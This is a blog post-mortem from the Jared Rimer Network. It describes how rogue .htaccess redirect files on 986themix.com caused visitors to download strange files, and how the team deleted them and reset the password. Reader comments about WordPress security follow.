At roughly 6 PM US Pacific Time, the Jared Rimer Network was called in regards to a web site outage from the person who runs and pays for hosting for 986themix.com. Below, we’ll detail what we found, the steps to resolve the problem, and information on how to contact the network for further questions.
What happened?
We aren’t completely sure what happened. We were getting download requests to the main site and the files were strangely named. The JRN doesn’t understand how this could be the case when the site was visited several days prior by the network in curiosity of something else they saw.
What did you find?
What we found were multiple .htaccess files located on the server.
Some of the files were located in user specific directories for podcasts that are hosted on the mix. The link we provide you is to Mozilla’s developer site where they talk about this file in more detail, so please check it out if you’re interested in what these files are and what they can do. Its a very powerful thing, but something that can possibly damage your web site.
The .htaccess files were dated from February 28th to today at 9:36 am. While I don’t understand the .htaccess file in full, what I can tell from each of them was that there was some redirect happening, where I don’t know. Some even had cpanel things in it that had a statement of not deleting those lines.
How many files were found?
I think there were about a half dozen of these files or so with varying similarities of what I described above.All of them had different time stamps however.
What did you do?
After determining that none of us who manage the web site wrote these files, or even have the knowledge of writing said files, I felt it safe on deleting these files as clearly they were redirecting somewhere and causing the browser to download strange files. No web site should ever ask you to download strangely named files. All files being downloaded off the Internet needs to be clearly marked as to what it is and placed on a page or clearly indicated in communication with intended recipients.
Per policies marked by our provider, files may not be left on our server without being linked.. This can be loosely taken though, because if you’re sending a link to a file to someone, you’re sending a link.
After I deleted all of these files, I instructed the owner to change the password to the account, as I thought that it was a possibility that someone got in through the control pannel and uploaded these files through the file management interface.
The site should now be up and operational at this time.
Who should I contact for questions?
Please contact the Jared Rimer Network’s Jared Rimer at 818-921-4976 or text/whats app 804-442-6975. Please use this contact and bug reporting form for email communication.
Thank you for your continued support. We’re as safe as possible under these circumstances. We hope that this doesn’t happen again. If it does, rest assured that the JRN will take the necessary steps to fix the problem quickly and efficiently.
Hello Shaun,
This report isn’t for jaredrimer.net although there was another issue in regards to it which partially effected me to comment as I was logged in. I’ve resolved that.
The post-,mortem report was meant to give the public information on the particular issue I’m glad that this blog was not affected by the issue, although some of my RSS feeds elsewhere were, but I’ve resolved that.
I deleted the .htaccess file on the main server thinking something happened but found another one in a directory I don’t access or put anything in and that was the problem. The .htaccess file I had had IP ranges and IPS that I wanted blocked because of Spam, but I will give all of that another chance and just call it good.
Thanks for reading!
Well nothing showed on the monitor so it didn’t come from here.
There wasn’t even a downtime recorded.
Mind you I was busy and wasn’t on here yesterday.
The only thing I changed was wordpress login via wordpress by turning it off because of 2step breakages.
Automatic has actually contacted me saying its my previder but since no one uses wordpress direct except for myself I will just login via the standard login.
There have been no issues on health status, andno breaches of the security system including no fake users.
The only htaccess modifications I allowed were the ones to do with the ssl plugins on here but that was ages ago.
The plugins did it themselves and I assume as long as the certs stay valid and or I need to touch them in any case.
We have blocked over 128k worth of brootforce intrusions and that number goes up slightly every month the attacks are constant but nothing has breached the security.
Site has kept itself updated including its plugins and I get emailed regular updates and search reports from my various tools.
I don’t have main server access anyway.